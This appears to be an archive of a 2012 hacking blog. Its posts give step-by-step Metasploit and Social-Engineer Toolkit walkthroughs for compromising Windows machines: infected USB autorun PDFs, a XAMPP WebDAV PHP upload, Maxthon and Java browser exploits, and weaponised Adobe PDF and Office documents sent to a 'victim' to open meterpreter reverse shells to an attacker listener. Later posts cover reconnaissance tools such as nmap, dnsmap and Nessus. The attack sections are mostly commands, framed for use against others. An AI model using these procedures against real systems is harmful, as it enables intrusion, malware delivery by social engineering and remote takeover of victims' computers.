Saturday, December 29, 2012

Remote System Hacking using USB + pdf Reader attack

Remote System Hacking using Autorun.inf file 
In this attack we use the autorun.inf file to establish the connection without clicking the file 

Requirement :
Attacker : Backtrack
Victim : windows xp , windows 7  having pdf reader or comparable vulnerable software like ms-office or etc

Step 1 : go to the social engineering toolkit using 
cd /pentest/exploits/set
./set




 Step 2 : select the Social-Engineering Attacks by selecting 1


Step 3 : Select Infectious Media Generator by selecting option 3


Infectious Media Generation generate a autorun.inf file and a metasploit payload and these files can be copied into the USB/DVD/CD as the victim open the USB the payloads runs automatically .


Step 4 : select 1 for file-format exploits


here is the list of payloads you can select the payloads as per your requirements here i am using 11 adobe pdf Embedded EXE Social Engineering .

Step 5 : select 1 for use your own PDF for Attack

Now enter the path to pdf file  as /home/exam-sheet.pdf (file name as exam-sheet.pdf )


Step 6 : select 2 for windows/meterpreter/reverse_tcp 


Step 7 : IP address for listener attacker machine IP here my system address will be 192.168.56.101 and select Port to connect as port 80 which provides us the reverse connection using this port .


Step 8 : here we need to edit the autorun.inf  file here go to the directory of autorun where our both files payload file & autorun file
follow the following steps to edit & rename our files

  • open new terminal and type 
            ls -al /pentest/exploits/set/autorun/ we can see two files here one is autorun file   and other is template
  • Now go to the directory cd /pentest/exploits/set/autorun
            cd /pentest/exploits/set/autorun : ls  (to see all files in the directory)
  • type nano autorun.inf (it will open a nano editor for editing autorun.inf file here give the name of your file which you want to open by plugin the USB here i gives the name as            exame-sheet.pdf)
  • for changing the name of the file type mv template.pdf exame-sheet.pdf
  • copy these both files into our usb drives 
As we plugins the usb in the victim system the meterpreter sessions will opens 
we can list the open sessions by typing sessions -l commands & for connecting the sessions type sessions -i 1 


Friday, December 28, 2012

Remote System Hacking using XAMPP Server


XAMPP WebDAV PHP Upload :

This module exploits weak WebDAV passwords on XAMPP servers. It uses supplied credentials to upload a PHP payload and execute it.
Exploit Targets :
  • xampp server having week webDAV passwords

Requirements :

Attacker : Backtrack
Victim : windows xp & windows 7

Step 1 : open terminal and type msfconsole metasploit framework.


Step 2 : use exploit/windows/http/xampp_webdav_upload_php



Step 3 : show payloads   (It shows us all the payloads comparable to exploits)



Step 4 : set RHOST 192.168.56.102 (target IP address )
Step 5 : set LHOST 192.168.56.101 (Attacker Machine IP address)
Step 6 : exploit


As we starts exploitation the reverse handler starts on attacker machine and the php payload is uploaded on the victim system .



Monday, December 24, 2012

WebSploit Framework

WebSploit Framework : WebSploit is an open source project which is used to scan and analysis remote system in order to find various type of vulnerabilities . This tool is very powerful and support multiple vulnerabilities.




Description

WebSploit Is An Open Source Project For :
[>]Social Engineering Works
[>]Scan,Crawler & Analysis Web
[>]Automatic Exploiter
[>]Support Network Attacks



----
[+]Autopwn - Used From Metasploit For Scan and Exploit Target Service
[+]wmap - Scan,Crawler Target Used From Metasploit wmap plugin
[+]format infector - inject reverse & bind payload into file format
[+]phpmyadmin Scanner
[+]LFI Bypasser
[+]Apache Users Scanner
[+]Dir Bruter
[+]admin finder
[+]MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
[+]MITM - Man In The Middle Attack
[+]Java Applet Attack
[+]MFOD Attack Vector
[+]USB Infection Attack
[+]ARP Dos Attack
[+]Web Killer Attack
[+]Fake Update Attack
[+]Fake Access point Attack

Sunday, December 23, 2012

Dnstracer :Information Gathering Tool

Dnstracer : dnstracer is a pen testing tool used for tracing a chain of DNS servers to the source


How Does DNStracer work ?
  • It sends the specified name-server a non-recursive request for the name.
  • Non-recursive means: if the name-server knows it, it will return the data requested. If the name-server doesn't know it, it will return pointers to name-servers that are authoritive for the domain part in the name or it will return the addresses of the root name-servers.
  • If the name server does returns an authoritative answer for the name, the next server is queried. If it returns an non-authoritative answer for the name, the name servers in the authority records will be queried.
  • The program stops if all name-servers are queried. Make sure the server you're querying doesn't do forwarding towards other servers, as dnstracer is not able to detect this for you. It detects so called lame servers, which are name-servers which has been told to have information about a certain domain, but don't have this information.




Syntax : dnstracer [options] [host]

dnstracer in verbose mode 




DNSmap : Information Gathering

Dnsmap: dnsmap is also a dns enumeration tool , It is basically used By Pen-testers to gather the Information about the target .


Features of Dnsmap:
  • obtain all IP addresses (A records) associated to each successfully bruteforced subdomain, rather than just one IP address per subdomain
  • abort the bruteforcing process in case the target domain uses wildcards
  • ability to be able to run the tool without providing a wordlist by using a built-in list of keywords
  • bruteforcing by using a user-supplied wordlist (as opposed to the built-in wordlist)
  • saving the results in human-readable and CSV format for easy processing
  • improved built-in subdomains wordlist
  • new bash script (dnsmap-bulk.sh) included which allows running dnsmap against a list of domains from a user-supplied file. i.e.: bruteforcing several domains in a bulk fashion
  • bypassing of signature-based dnsmap detection by generating a proper pseudo-random subdomain when checking for wildcards

For the DNSmap in Backtrack 5 go to the following steps :

Applications>Backtrack>Information Gathering>Network Analysis>DNS analysis>dnsmap


Syntax : ./dnsmap <target-domain> [options]



DNSenum : Information Gathering

Dnsenum: Dnsenum is ainformation Gathering Tool,It is available in the Backtrack 5 .we can find the Following Information using DNSenum

  • Host address
  • Name server
  • MX record 
  • Sub domains
  • Whois performance 
  • Reverse lookup for netblocks
  • Use google to do the job done
For the DNSenum in Backtrack 5 go to the following steps :

Applications>Backtrack>Information Gathering>Network Analysis>DNS analysis>dnsenum


Syntax:  ./dnsenum.pl [options] <domain>





Monday, December 17, 2012

Remote System Hacking using Maxthon Browser


Maxthon3 about:history XCS Trusted Zone Code Execution

Cross Context Scripting (XCS) is possible in the Maxthon about:history page. Injection in such privileged/trusted browser zone can be used to modify configuration settings and execute arbitrary commands. Please note this module only works against specific versions of XCS. Currently, we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.
Exploit Targets :
  • 0 - Maxthon 3 (prior to 3.3) on Windows (default)

Requirement :

Attacker : Backtrack
Victim    : Windows 

Step 1 : open terminal and type msfconsole metasploit framework




Step 2 : use exploit/windows/browser/mexthon_history_xcs  
Step 3 : set payload windows/meterpreter/reverse_tcp
Step 4 : show options



Step 5 : set all the perimeters 


set SRVHOST 192.168.56.102 (IP Address of the Local Machine)
set URIPATH /  (root Address)
set LHOST 192.168.56.102 (Host IP Address)
Step 6 : exploit 

Now the reverse handler is start on 192.168.56.102:4444 our host address and exploit is start on the url http://192.168.56.102:8080/   and we have to send this url to the victim machine as the victim click on the url we get the meterpreter sessions . Here we get the two meterpreter sessions let's check this by using command sessions -l   this command shows us list of all the Active sessions 

Now type sessions -i 1 to get the meterpreter sessions now let me check the sysinfo  this command gives us the information about the remote system. now type shell  to get into the remote system .



And now we have the cmand prompt of the remote system . 

Friday, December 14, 2012

Remote System Hacking using Java Applet JAX-WS


Java Applet JAX-WS Remote Code Execution

This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.

Exploit Targets

  • 0 - Generic (Java Payload) (default)
  • 1 - Windows Universal
  • 2 - Linux x 86

Requirement :

Attacker :Backtrack
Victim PC : Windows 

Step 1: open terminal and type msfconsole



Step 1: Now use exploit/multi/browser/java_jre17_jaxws


Step 2 : search for the payload here we are using java/shell_reverse_tcp 
show options


set  the required options 
set LHOST 192.168.133.130
set SRVHOST 192.168.133.130
Now exploit 



Now list  the sessions by using sessions -l command to access the session use sessions -i 1 (session ID) 

Thursday, December 13, 2012

Hack Remote PC using Adobe Reader

Adobe Acrobat Bundled LibTIFF Integer Overflow

This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3.

Exploit Targets

  • Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass) (default)

Requirement :


Attacker :Backtrack
Victim PC : Windows 

Step 1: open terminal and type msfconsole


Step 2: Now type use exploit/windows/fileformat/adobe_libtiff
set payload windows/meterpreter/reverse_tcp
show options

Step 3 : set the required parameters

set FILENAME result.pdf
set LHOST 192.168.56.102
exploit



Now the pdf file is created which we have to send at /root/.msf4/local/result.pdf
we have to send this file to victim 

Step 4: to get the reverse connection we set the multi handler 

Now we have to use a multi handler session so that we can get the reverse connection to do that we have to use 

use exploit/multi/handler

and 

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
exploit



 as the victim click on it the meterpreter session is on we done the job



Hack Remote PC using microsoft Office 2007 & 2010


MS12-027 MSCOMCTL ActiveX Buffer Overflow



This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild on April 2012. This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses "msgr3en.dll", which will load after office got load, so the malicious file must be loaded through "File / Open" to achieve exploitation.


Exploit Targets

  • 0 - Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English (default)
  • 1 - Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English

Requirement

Attacker :Backtrack 
Victim PC : Windows xp

step 1: open your terminal and type msfconsole 



Step 2: now type use exploit/windows/fileformat/ms12_027_mscomctrl_bof


Step 3 : set the required paremeters 

set payload windows/meterpreter/reverse_tcp
show options
set FILENAME Hack.doc (give name to the file you want)
set lhost 192.168.56.102
exploit


now the doc file which we have to sent to the victim is created at /root/.msf4/local/hack.doc
we have to send this file to the victim

Step 4: to get the reverse connection we set the multi handler 

Now we have to use a multi handler session so that we can get the reverse connection to do that we have to use 

use exploit/multi/handler

and 

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
exploit

 as the victim click on it the meterpreter session is on we done the job

Sunday, December 9, 2012

Nessus : Vulnerability Scanner

Nessus : In computer securityNessus is a proprietary comprehensive vulnerability scanning program. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems.


Nessus allows scans for the following types of vulnerabilities:
  • Vulnerabilities that allow a remote hacker to control or access sensitive data on a system.
  • Misconfiguration (e.g. open mail relay, missing patches, etc.).
  • Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
  • Denials of service against the TCP/IP stack by using mangled packets
  • Preparation for PCI DSS audits


first of all we need to Registerthe nessuss it will provide us the activation code. 
Go to the Application>Backtrack>Vulnerability Assessment>Vulnerability Scanners>Nessuss>Nessuss Registration.
It will send us on the nessuss website for registration click on home user register it will provide you a activation code 
Now follows the steps
Go to the terminal and type /opt/nessus/bin/nessus -fetch --register <Code here>


 Now we have to add a user for adding a user Go to Application>Backtrack>Vulnerability Assessment>Vulnerability Scanners>Nessuss>nessus user add 
or goto the terminal and type /opt/nessus/sbin/nessus-adduser
 To start the nessus goto Application>Backtrack>Vulnerability Assessment>Vulnerability Scanners>Nessuss>nessus start



Saturday, December 8, 2012

Joomscan :Vulnerability Scanner

Joomscan : joomscan is the CMS Vulnerability Identification Tool this tool is used for finding the vulnerability in the website. joomscan is a signature based scanner which can detect the XSS?CSRF ,aql injection etc in the website .

Go to : Backtrack>Vulnerability Assessment>Web Assessment>CMS Vulnerability Identification Tool>joomsc           

                                      




now just ./joomscan.pl -u  www.techtecno2u.com <target url>





nmap Scanning Tool (Network Mapper Tool)

How to find All System in the network
nmap -sn 192.168.56.103



How to Detect Operating System of Remote System
nmap -O 192.168.56.103


 How to Detect Services on Port of Remote System
nmap -sV 192.168.56.103



How to find all IP Protocols
nmap -sO 192.168.56.103


UDP port Scanning of Remote System
nmap -sU 192.168.56.103


TCP Port Scanning of Remote System
nmap -sT 192.168.56.103


How to scan Web Server of a website
nmap -sV -T4 -F target website